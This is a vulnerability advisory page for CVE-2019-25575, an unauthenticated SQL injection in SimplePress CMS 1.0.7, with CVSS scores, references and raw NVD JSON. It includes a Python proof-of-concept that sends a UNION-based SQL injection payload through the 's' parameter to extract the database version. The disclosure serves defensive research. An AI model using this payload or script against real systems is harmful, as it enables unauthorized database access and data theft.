Security Vulnerability Report
CVE-2019-25575 CVSS 8.2 HIGH

CVE-2019-25575

Published: 2026-03-21 16:16:01
Last Modified: 2026-04-15 17:09:48

Description

SimplePress CMS 1.0.7 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'p' and 's' parameters. Attackers can send GET requests with crafted SQL payloads to extract sensitive database information including usernames, database names, and version details.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:simplepresscms:simplepress_cms:*:*:*:*:*:*:*:* - VULNERABLE
SimplePress CMS 1.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_sqli(target_url):
    """
    PoC for CVE-2019-25575
    SimplePress CMS SQL Injection
    Vulnerable parameters: 'p' and 's'
    """
    # Payload to extract database version using UNION based SQL injection
    # Note: The number of columns might need adjustment based on the specific query
    payload = {
        "p": "1",
        "s": "1' UNION SELECT 1, version(), 3, 4, 5-- -"
    }

    try:
        response = requests.get(target_url, params=payload, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent to {target_url}")
            print(f"[+] Payload: {payload}")
            print("[+] Response snippet:")
            print(response.text[:500])  # Display part of the response
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://127.0.0.1/simplepress/index.php"
    exploit_sqli(target)
```

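References

https://ayera.dl.sourceforge.net/project/simplepresscms/1.0%20alpha/1.0.7_alpha.zip (Broken Link)
https://sourceforge.net/projects/simplepresscms/ (Product)
https://www.exploit-db.com/exploits/46235 (Exploit, VDB Entry)
https://www.vulncheck.com/advisories/simplepress-cms-sql-injection-via-p-and-s-parameters (Third Party Advisory)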

Raw JSON Data

{"cve": {"id": "CVE-2019-25575", "sourceIdentifier": "[email protected]", "published": "2026-03-21T16:16:01.147", "lastModified": "2026-04-15T17:09:48.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SimplePress CMS 1.0.7 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'p' and 's' parameters. Attackers can send GET requests with crafted SQL payloads to extract sensitive database information including usernames, database names, and version details."}, {"lang": "es", "value": "SimplePress CMS 1.0.7 contiene una vulnerabilidad de inyección SQL que permite a atacantes no autenticados ejecutar consultas SQL arbitrarias inyectando código malicioso a través de los parámetros 'p' y 's'. Los atacantes pueden enviar solicitudes GET con cargas útiles SQL manipuladas para extraer información sensible de la base de datos, incluyendo nombres de usuario, nombres de bases de datos y detalles de la versión."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:simplepresscms:simplepress_cms:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.0.7", "matchCriteriaId": "CF1C4B49-CB22-4030-B87B-EB5D48CAAE1A"}]}]}], "references": [{"url": "https://ayera.dl.sourceforge.net/project/simplepresscms/1.0%20alpha/1.0.7_alpha.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://sourceforge.net/projects/simplepresscms/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46235", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/simplepress-cms-sql-injection-via-p-and-s-parameters", "source": 
"[email protected]", "tags": ["Third Party Advisory"]}]}}